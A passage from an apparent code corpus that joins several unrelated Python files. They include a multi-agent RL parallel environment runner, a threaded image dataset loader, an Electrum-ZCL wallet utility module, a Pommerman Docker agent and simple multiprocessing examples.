num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')
self.result = self.sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Actual detection.
return self.result
else:
return None
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
# Make subprocesses for the envs
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
env_fn = env_REGISTRY[self.args.env]
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
p.start()
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
self.won_count = []
def setup(self, scheme, groups, preprocess, mac):
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
def get_env_info(self):
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
self.batch.update(pre_transition_data, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
self.reset()
all_terminated = False
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
terminated = [False for _ in range(self.batch_size)]
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
episode_returns[idx] += self.args.gamma**self.t * (data["reward"]*self.env_info['n_agents'])
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if test_mode and 'battle_won' in data['info'].keys():
self.won_count.append(data["info"]['battle_won'])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
# if test_mode and (len(self.test_returns) == n_test_runs):
# self._log(cur_returns, cur_stats, log_prefix)
# elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
# self._log(cur_returns, cur_stats, log_prefix)
# if hasattr(self.mac.action_selector, "epsilon"):
# self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
# self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
data_updater.py
|
from apitizer import db_controller
from apitizer import img_parser
import threading
import time
import cv2
class Updater:
def __init__(self, parser_config):
self.parser = img_parser.ImageParser(parser_config)
self.db_controller = db_controller.DatabaseController()
self.runner_thread = threading.Thread(target=self.run)
def initiate(self):
self.runner_thread.start()
def update(self):
results = self.parser.get_results()
self.db_controller.insert_or_update(results)
def run(self):
while True:
try:
self.update()
print("Image updated")
except cv2.error:
print("Can not process image")
except AttributeError:
print("None type object appeared in result")
except KeyError:
print("None type object appeared in result")
except:
print("unknown error")
time.sleep(60)
|
data.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import math
import random
import cv2
import numpy as np
from queue import Queue
from threading import Thread as Process
#from multiprocessing import Process,Queue
import time
from .utils import *
from skimage.io import imread
from skimage.transform import resize
class DataSet(object):
"""TextDataSet
process text input file dataset
text file format:
image_path
"""
def __init__(self, common_params=None, dataset_params=None):
"""
Args:
common_params: A dict
dataset_params: A dict
"""
if common_params:
self.image_size = int(common_params['image_size'])
self.batch_size = int(common_params['batch_size'])
if dataset_params:
self.data_path = str(dataset_params['path'])
self.thread_num = int(int(dataset_params['thread_num']) / 2)
self.thread_num2 = int(int(dataset_params['thread_num']) / 2)
#record and image_label queue
self.record_queue = Queue(maxsize=10000)
self.image_queue = Queue(maxsize=5000)
self.batch_queue = Queue(maxsize=100)
self.record_list = []
# filling the record_list
input_file = open(self.data_path, 'r')
for line in input_file:
line = line.strip()
self.record_list.append(line)
self.record_point = 0
self.record_number = len(self.record_list)
self.num_batch_per_epoch = int(self.record_number / self.batch_size)
t_record_producer = Process(target=self.record_producer)
t_record_producer.daemon = True
t_record_producer.start()
for i in range(self.thread_num):
t = Process(target=self.record_customer)
t.daemon = True
t.start()
for i in range(self.thread_num2):
t = Process(target=self.image_customer)
t.daemon = True
t.start()
def record_producer(self):
"""record_queue's processor
"""
while True:
if self.record_point % self.record_number == 0:
random.shuffle(self.record_list)
self.record_point = 0
self.record_queue.put(self.record_list[self.record_point])
self.record_point += 1
def image_process(self, image):
"""record process
Args: record
Returns:
image: 3-D ndarray
"""
h = image.shape[0]
w = image.shape[1]
if w > h:
image = cv2.resize(image, (int(self.image_size * w / h), self.image_size))
mirror = np.random.randint(0, 2)
if mirror:
image = np.fliplr(image)
crop_start = np.random.randint(0, int(self.image_size * w / h) - self.image_size + 1)
image = image[:, crop_start:crop_start + self.image_size, :]
else:
image = cv2.resize(image, (self.image_size, int(self.image_size * h / w)))
mirror = np.random.randint(0, 2)
if mirror:
image = np.fliplr(image)
crop_start = np.random.randint(0, int(self.image_size * h / w) - self.image_size + 1)
image = image[crop_start:crop_start + self.image_size, :, :]
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def record_customer(self):
"""record queue's customer
"""
while True:
item = self.record_queue.get()
out = cv2.imread(item)
if len(out.shape)==3 and out.shape[2]==3:
self.image_queue.put(out)
def image_customer(self):
while True:
images = []
for i in range(self.batch_size):
image = self.image_queue.get()
image = self.image_process(image)
images.append(image)
images = np.asarray(images, dtype=np.uint8)
self.batch_queue.put(preprocess(images))
def batch(self):
"""get batch
Returns:
images: 4-D ndarray [batch_size, height, width, 3]
"""
print(self.record_queue.qsize(), self.image_queue.qsize(), self.batch_queue.qsize())
return self.batch_queue.get()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZCL':8, 'mZCL':5, 'uZCL':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zcl")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'Unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com',
{'tx': 'tx', 'addr': 'address'}),
'ZCLMine.pro': ('http://explorer.zclmine.pro',
{'tx': 'tx', 'addr': 'address'}),
'MyZCL.com': ('http://myzcl.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zcl testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'ZclassicExplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zclassic address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zclassic address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
|
docker_agent.py
|
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class DockerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
docker_image,
port,
server='http://localhost',
character=characters.Bomber,
docker_client=None,
env_vars=None):
super(DockerAgent, self).__init__(character)
self._docker_image = docker_image
self._docker_client = docker_client or docker.from_env()
self._server = server
self._port = port
self._container = None
self._env_vars = env_vars or {}
container_thread = threading.Thread(
target=self._run_container, daemon=True)
container_thread.start()
self._wait_for_docker(self._server, self._port, 32)
def _run_container(self):
print("Starting container...")
# Any environment variables that start with DOCKER_AGENT are passed to the container
env_vars = self._env_vars
for key, value in os.environ.items():
if not key.startswith("DOCKER_AGENT_"):
continue
env_key = key.replace("DOCKER_AGENT_", "")
env_vars[env_key] = value
self._container = self._docker_client.containers.run(
self._docker_image,
detach=True,
auto_remove=True,
ports={10080: self._port},
environment=env_vars)
@staticmethod
def _wait_for_docker(server, port, timeout=None):
"""Wait for network service to appear.
Args:
port: Integer port.
timeout: Seconds to wait. 0 waits forever.
"""
backoff = .25
max_backoff = min(timeout, 16)
if timeout:
# time module is needed to calc timeout shared between two exceptions
end = time.time() + timeout
while True:
try:
now = time.time()
if timeout and end < now:
return False
request_url = '%s:%s/ping' % (server, port
) # 'http://localhost', 83
req = requests.get(request_url)
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except docker.errors.APIError as e:
print("This is a Docker error. Please fix: ", e)
raise
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.25,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
action = [0] * len(action_space.shape)
if len(action) == 1:
action = action[0]
return action
def shutdown(self):
print("Stopping container..")
if self._container:
try:
return self._container.remove(force=True)
except docker.errors.NotFound as e:
return True
|
with_multiprocess.py
|
from time import time
from multiprocessing import Process
def factorize(number):
for i in range(1, number + 1):
if number % i == 0:
yield i
def main():
numbers = [8402868, 2295738, 5938342, 7925426]
start = time()
processes = []
for number in numbers:
process = Process(target=factorize, args=(number,))
process.start()
processes.append(process)
# wait for all thread to finish
for p in processes:
p.join()
end = time()
print(f'Took {end - start:.3f} seconds')
if __name__ == '__main__':
main()
|
mprocess.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: 多线程示例程序
Desc :
"""
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s)...' % (name, os.getpid()))
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print('Task %s runs %0.2f seconds.' % (name, (end - start)))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Pool(4)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
